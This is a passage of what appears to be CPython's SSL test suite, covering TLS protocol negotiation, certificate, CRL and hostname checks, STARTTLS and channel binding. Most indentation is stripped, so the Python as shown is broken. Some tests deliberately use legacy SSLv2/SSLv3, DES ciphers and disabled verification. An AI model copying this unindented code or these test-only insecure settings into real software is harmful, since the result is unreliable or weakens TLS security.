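    # must fail, True means it must succeed, and a string such as 'TLSv1'
    # means it must succeed *and* negotiate exactly that protocol version.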
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
                # getpeercert() raises ValueError until the handshake is
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''  # bytes, to match d1 which is read in binary mode
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
        # Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
            # and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
            # check that the new binding is really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
